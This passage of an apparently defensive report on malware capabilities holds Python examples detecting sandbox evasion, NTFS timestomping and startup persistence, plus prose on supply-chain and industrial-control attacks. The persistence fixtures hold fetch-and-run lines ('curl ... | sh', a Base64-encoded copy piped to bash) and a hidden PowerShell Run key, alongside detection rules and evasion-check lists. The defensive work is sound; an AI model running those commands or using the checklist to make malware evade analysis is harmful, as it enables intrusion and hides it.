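VM_MAC_OUIS = {
    "00:0c:29": "VMware", "00:50:56": "VMware", "00:05:69": "VMware",
    "08:00:27": "VirtualBox", "00:15:5d": "Hyper-V", "52:54:00": "QEMU/KVM",
}
GUEST_AGENTS = {"vboxservice.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "prl_tools.exe"}
ANALYSIS_TOOLS = {"wireshark.exe", "procmon.exe", "procmon64.exe", "x64dbg.exe",
                  "ollydbg.exe", "fiddler.exe", "ida64.exe"}
GUEST_DRIVERS = {"vboxmouse.sys", "vboxguest.sys", "vmhgfs.sys", "vmmouse.sys", "vm3dmp.sys"}
GUEST_REG_KEYS = {
    r"hklm\software\oracle\virtualbox guest additions",
    r"hklm\software\vmware, inc.\vmware tools",
}
HOSTNAME_WORDS = ("sandbox", "malware", "virus", "analy", "cuckoo")


def sandbox_indicators(env: dict) -> list[str]:
    """Run the checks evasive malware commonly performs against a description of
    the host. Returns the indicators that fired; an empty list means the host
    looks like an ordinary user workstation to these checks."""
    hits = []
    mac = env.get("mac", "").lower()
    if (vendor := VM_MAC_OUIS.get(mac[:8])):
        hits.append(f"MAC OUI {mac[:8]} is assigned to {vendor}")
    if env.get("cpu_count", 0) < 2:
        hits.append("fewer than 2 CPUs")
    if env.get("ram_gb", 0) < 4:
        hits.append("less than 4 GB RAM")
    if env.get("disk_gb", 0) < 80:
        hits.append("disk smaller than 80 GB")
    if env.get("uptime_min", 0) < 10:
        hits.append("uptime under 10 minutes (freshly reverted snapshot)")
    procs = {p.lower() for p in env.get("processes", [])}
    hits += [f"hypervisor guest agent running: {p}" for p in sorted(procs & GUEST_AGENTS)]
    hits += [f"analysis tool running: {p}" for p in sorted(procs & ANALYSIS_TOOLS)]
    drivers = {d.lower() for d in env.get("drivers", [])}
    hits += [f"hypervisor guest driver present: {d}" for d in sorted(drivers & GUEST_DRIVERS)]
    keys = {k.lower() for k in env.get("registry_keys", [])}
    hits += [f"guest tools registry key present: {k}" for k in sorted(keys & GUEST_REG_KEYS)]
    if env.get("user_files", 0) < 20:
        hits.append("sparse user profile (fewer than 20 documents)")
    host = env.get("hostname", "").lower()
    if any(w in host for w in HOSTNAME_WORDS):
        hits.append(f"hostname '{env.get('hostname')}' names the analysis purpose")
    return hits


# Constructed host descriptions (not captured from real machines).
DEFAULT_ANALYSIS_VM = {
    "hostname": "SANDBOX-01", "mac": "08:00:27:4e:66:a1", "cpu_count": 1, "ram_gb": 2,
    "disk_gb": 40, "uptime_min": 3, "user_files": 3,
    "processes": ["explorer.exe", "VBoxService.exe", "VBoxTray.exe", "Wireshark.exe"],
    "drivers": ["VBoxMouse.sys"],
    "registry_keys": [r"HKLM\SOFTWARE\Oracle\VirtualBox Guest Additions"],
}
HARDENED_VM = {
    "hostname": "DESKTOP-K3R7Q2", "mac": "3c:97:0e:12:34:56", "cpu_count": 4, "ram_gb": 16,
    "disk_gb": 256, "uptime_min": 4320, "user_files": 140,
    "processes": ["explorer.exe", "OUTLOOK.EXE", "chrome.exe"],
    "drivers": [], "registry_keys": [],
}

if __name__ == "__main__":
    for name, env in (("default analysis VM", DEFAULT_ANALYSIS_VM), ("hardened VM", HARDENED_VM)):
        print(f"{name}: {len(sandbox_indicators(env))} indicators")
        for h in sandbox_indicators(env):
            print("  -", h)
```

The default VM trips twelve indicators, the hardened one none. Real samples also use timing tricks (sleeping past the sandbox's analysis window, or measuring whether `Sleep` was accelerated) that no static host description captures; those are countered in the sandbox by patching sleep calls and by running samples long enough, not by the checklist above.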

Anti-forensics techniques are the capabilities malware uses to erase evidence of compromise and hinder incident response investigations. Timestomping, the most common form of time manipulation, rewrites the creation, modification and access timestamps of a malicious file so that it blends in with the legitimate files around it; on NTFS those timestamps are stored in the Master File Table (MFT), the volume's index of every file, and corrupting that metadata makes it harder for investigators to reconstruct the incident timeline. Disk or data wiping is a blunter technique in which attackers delete or overwrite an entire drive to erase their traces, sometimes overwriting it several times to make sure the data is irrecoverable; it takes time to complete, but it destroys the very evidence an investigation depends on and can stall it entirely.
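Timestomping leaves detectable inconsistencies because NTFS keeps two sets of timestamps per file. The following added example (not from the original article; the MFT records are constructed, and it models NTFS's 100-nanosecond timestamps at Python's microsecond resolution) applies two standard checks to three constructed records: a normal file, a stomped implant, and a copied file that should not fire.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class MftRecord:
    """Timestamps from one MFT entry. $STANDARD_INFORMATION ($SI) is what the
    normal file APIs read and write; $FILE_NAME ($FN) is maintained by the kernel
    and is not reachable through SetFileTime, so the two normally agree."""
    path: str
    si_created: datetime
    si_modified: datetime
    fn_created: datetime
    fn_modified: datetime


def timestomp_indicators(rec: MftRecord, slack: timedelta = timedelta(seconds=2)) -> list[str]:
    hits = []
    # 1. $SI backdated below $FN: a file cannot have been created before the
    #    kernel stamped its $FN creation time.
    if rec.si_created < rec.fn_created - slack:
        hits.append("$SI creation time precedes $FN creation time")
    # 2. Stomping tools commonly set times at whole-second granularity, leaving the
    #    sub-second part zero while the kernel-written $FN keeps its precision.
    si_whole = rec.si_created.microsecond == 0 and rec.si_modified.microsecond == 0
    fn_precise = rec.fn_created.microsecond or rec.fn_modified.microsecond
    if si_whole and fn_precise:
        hits.append("$SI timestamps have zero sub-second precision while $FN does not")
    return hits


def triage(records: list[MftRecord]) -> dict[str, list[str]]:
    """Map path -> indicators for every record that fired at least one."""
    return {r.path: h for r in records if (h := timestomp_indicators(r))}


# Constructed records (not parsed from a real volume).
RECORDS = [
    # Ordinary file: $SI and $FN agree, sub-second precision present on both.
    MftRecord(r"C:\Users\alice\report.docx",
              datetime(2024, 3, 11, 9, 14, 22, 481213), datetime(2024, 3, 12, 17, 2, 5, 90311),
              datetime(2024, 3, 11, 9, 14, 22, 481213), datetime(2024, 3, 11, 9, 14, 22, 481213)),
    # Stomped implant: $SI pushed back to 2019 at whole seconds; $FN still holds
    # the real 2024 drop time with sub-second precision.
    MftRecord(r"C:\Windows\System32\wbem\svchosts.dll",
              datetime(2019, 6, 1, 12, 0, 0, 0), datetime(2019, 6, 1, 12, 0, 0, 0),
              datetime(2024, 3, 11, 9, 15, 3, 118542), datetime(2024, 3, 11, 9, 15, 3, 118542)),
    # Copied file: $SI modified precedes $SI created, which is normal for a copy
    # and must not fire.
    MftRecord(r"C:\Users\alice\Downloads\old-notes.txt",
              datetime(2024, 3, 11, 9, 20, 0, 123456), datetime(2022, 1, 5, 8, 0, 0, 654321),
              datetime(2024, 3, 11, 9, 20, 0, 123456), datetime(2024, 3, 11, 9, 20, 0, 123456)),
]

if __name__ == "__main__":
    for path, hits in triage(RECORDS).items():
        print(path)
        for h in hits:
            print("  -", h)
```

Both checks have known blind spots: $FN timestamps are rewritten from $SI when a file is renamed or moved, so an attacker who stomps and then renames defeats the first check, and a tool that copies full-precision timestamps from a neighbouring file defeats the second. Corroborate with the USN journal and $LogFile, which record the actual sequence of operations.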

Persistence mechanisms let malware keep its access across the system reboots, credential changes, and user logouts that would otherwise end its execution. Persistence covers any access, action, or configuration change that lets an adversary keep a foothold on a system, such as replacing or hijacking legitimate code or adding startup code. On Windows, Registry run keys and the Startup folder are among the most common mechanisms: the adversary adds a program to a startup folder or references it from a Run key, and the malware executes each time the user logs on or the system starts. On Linux appliances, sophisticated samples modify init.d scripts, /etc/rc.local, or systemd unit files so that the implant starts on reboot, often using the sed utility to splice a line into a legitimate startup script; because the hook sits inside a trusted file, a clean-up that removes only the obvious malicious files leaves the hook in place.
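A defender looking for the persistence hooks described above can audit the startup locations directly. The following added example (not code from the original article; the `reg query` output, the rc.local and systemd unit contents, and the scoring weights are constructed assumptions) parses the three kinds of startup entries and scores each command for the traits that distinguish an implant's hook from a legitimate autostart.

```python
import re

# Constructed artefacts (not collected from a real host).
REG_QUERY_RUN = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    powershell.exe -w hidden -nop -File C:\Users\alice\AppData\Roaming\svc\update.ps1
    Discord     REG_SZ    C:\Users\alice\AppData\Local\Discord\Update.exe --processStart Discord.exe
"""
RC_LOCAL = """#!/bin/sh -e
/usr/sbin/ntpd -g
(curl -fsSL http://203.0.113.10/x.sh | sh) &
exit 0
"""
# The Base64 token below decodes to "curl -fsSL http://203.0.113.10/x.sh | sh".
SYSTEMD_UNIT = """[Unit]
Description=System Update Service
[Service]
ExecStart=/bin/bash -c 'echo Y3VybCAtZnNTTCBodHRwOi8vMjAzLjAuMTEzLjEwL3guc2ggfCBzaA== | base64 -d | bash'
Restart=always
[Install]
WantedBy=multi-user.target
"""

# (weight, pattern, reason). Weights are a triage aid, not a verdict.
RULES = [
    (2, re.compile(r"\b(powershell|pwsh|wscript|cscript|mshta|regsvr32|rundll32|cmd(\.exe)?\s+/c|(ba)?sh\s+-c)\b", re.I),
     "script host or command interpreter as the startup program"),
    (2, re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
     "hidden-window / no-profile / non-interactive flags"),
    (1, re.compile(r"(appdata\\roaming|\\temp\\|programdata|\\users\\public|/tmp/|/dev/shm|/var/tmp)", re.I),
     "program lives in a user-writable or staging directory"),
    (3, re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{24,}={0,2}(?![A-Za-z0-9+/])"),
     "long Base64-looking token in the command"),
    (3, re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I),
     "download piped straight into a shell"),
]


def parse_run_keys(text: str) -> dict[str, str]:
    """'reg query' output: indented lines of  name  REG_type  data  (value names
    without spaces are assumed)."""
    return {m.group(1): m.group(3)
            for m in re.finditer(r"^[ \t]+(\S+)[ \t]+(REG_[A-Z_]+)[ \t]+(.*)$", text, re.M)}


def parse_rc_local(text: str) -> dict[str, str]:
    cmds = [l.strip() for l in text.splitlines()
            if l.strip() and not l.startswith("#") and l.strip() != "exit 0"]
    return {f"rc.local:{i}": c for i, c in enumerate(cmds, 1)}


def parse_systemd_unit(text: str, unit: str = "update.service") -> dict[str, str]:
    return {f"{unit}:ExecStart": l.split("=", 1)[1].strip()
            for l in text.splitlines() if l.startswith("ExecStart=")}


def score(command: str) -> tuple[int, list[str]]:
    fired = [(weight, reason) for weight, pat, reason in RULES if pat.search(command)]
    return sum(w for w, _ in fired), [r for _, r in fired]


def audit(entries: dict[str, str], threshold: int = 3) -> dict[str, tuple[int, list[str]]]:
    """Return the entries whose score reaches the threshold, keyed by entry name."""
    return {name: res for name, cmd in entries.items() if (res := score(cmd))[0] >= threshold}


def all_entries() -> dict[str, str]:
    return {**parse_run_keys(REG_QUERY_RUN), **parse_rc_local(RC_LOCAL),
            **parse_systemd_unit(SYSTEMD_UNIT)}


if __name__ == "__main__":
    for name, (s, reasons) in audit(all_entries()).items():
        print(f"[{s}] {name}: " + "; ".join(reasons))
```

Three entries reach the threshold: the hidden-window PowerShell Run key, the curl-pipe-sh line spliced into rc.local, and the unit whose ExecStart decodes a Base64 blob into bash. OneDrive and Discord, both legitimately installed under AppData\Local, score zero, which is why the user-writable-path rule carries only weight 1 on its own. A real audit walks HKLM and HKCU Run and RunOnce, Winlogon, scheduled tasks, services and WMI subscriptions on Windows, and cron, profile scripts and every enabled unit on Linux; the scoring logic is the same.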

Supply Chain Attacks and Pre-Installation Threats

Supply chain attacks are a critical malware delivery mechanism: they compromise software or hardware before it reaches end users, so a single intrusion can infect massive numbers of devices simultaneously. Software supply chain attacks target the less-secure elements of a software supply network and exploit the trust between suppliers and customers; an attacker who infiltrates any stage of the chain, from a component vendor to a build system to a distributor, gains unauthorized access to the downstream systems and data that trust its output. The complexity and interconnectivity of modern software supply chains make them attractive targets, because organizations routinely rely on third-party suppliers for components and services, and each such dependency is a potential point of exploitation.

Mobile malware distributed through compromised supply chains shows the real-world impact of these attacks at scale. Triada, a rooting Trojan, entered the supply chain when millions of Android devices shipped with it pre-installed; it gained access to sensitive parts of the operating system and installed spam apps that displayed ads, sometimes replacing legitimate ones, with the revenue from user clicks on the unauthorized ads flowing to Triada's developers. The BadBox 2.0 botnet is a more recent and far larger supply chain attack: more than 10 million smart TVs, digital projectors, in-car infotainment systems, and even digital picture frames were compromised by malware that reached them in three ways, pre-installed before purchase, retrieved from a command-and-control server the device contacted on first boot, or downloaded from third-party app marketplaces. Infected devices were enrolled in a global botnet used for click fraud, account hijacking, residential proxy services, and distributed denial-of-service attacks, an operation that relied on BadBox's ability to evade detection by blending in with legitimate network traffic and on the vast reach of consumer IoT to scale worldwide.

Critical Infrastructure Compromise and Real-World Consequences

The targeting of critical infrastructure is perhaps the most consequential category of malware capability, since attacks can disrupt the essential services on which modern society depends. Iran-affiliated and pro-Russia cyber actors gained access to, and in some cases manipulated, US industrial control systems in the food and agriculture, healthcare, and water and wastewater sectors in late 2023 and 2024, highlighting a public safety threat and a route by which malicious actors can cause physical damage and deny critical services. Outdated software, poor password hygiene, default credentials, and limited resources for system updates leave ICS devices vulnerable, and those devices are commonly connected to corporate IT networks and increasingly to the Internet, while many operators face competing priorities that further constrain the time and resources they can devote to cybersecurity.

The IRGC-affiliated Cyber Av3ngers compromised Unitronics Vision Series programmable logic controllers at multiple US entities, mostly water and wastewater systems, and defaced the PLCs' touch screens with an anti-Israel message; a few water-sector victims briefly shut down their systems and switched to manual operation in response. Pro-Russia hacktivists remotely manipulated control systems at five water and wastewater systems and two dairies, typically reaching the ICS components through control interfaces exposed on public-facing IP addresses, and in documented incidents the group posted videos of attackers remotely changing settings on human-machine interfaces (HMIs) in US wastewater systems. This level of direct manipulation demonstrates the severe consequences of ICS compromise: attackers can physically affect the operation of critical infrastructure, with direct implications for public health and safety.

The Extent of Malware’s Capabilities

The analysis presented throughout this report demonstrates that modern malware represents a comprehensive and escalating threat to cybersecurity across virtually every sector and scale of operation, from individual users to critical infrastructure systems upon which millions of people depend. Malware’s capabilities have evolved from simple file deletion or system slowdowns to sophisticated operations encompassing data theft, system control, financial extortion, resource exploitation, surveillance, system damage, and critical infrastructure disruption. The diversity of malware objectives reflects the diversity of threat actors employing it, ranging from financially motivated cybercriminals seeking quick profits through ransomware and credential theft, to nation-state actors conducting espionage and infrastructure sabotage, to hacktivists pursuing political or social objectives through system disruption.

The technical sophistication of contemporary malware continues to increase as threat actors invest substantial resources in developing evasion techniques, persistence mechanisms, and novel delivery mechanisms that circumvent traditional security defenses. The convergence of multiple attack techniques—combining credential theft with lateral movement, data exfiltration with encryption, and service disruption with third-party extortion—demonstrates how modern malware enables attack campaigns of unprecedented complexity and impact. Organizations and individuals facing these threats must adopt comprehensive security postures that extend beyond simple antivirus software to encompass vulnerability management, network segmentation, threat detection and response capabilities, and organizational security awareness programs. The stakes of malware threats continue to rise as critical infrastructure becomes increasingly connected and dependent on digital systems, with successful malware attacks potentially affecting not just individual organizations but the functioning of essential services upon which entire communities and nations depend. Understanding what malware can do remains essential for developing effective defensive strategies and maintaining organizational and national cybersecurity in the face of continuously evolving threats.
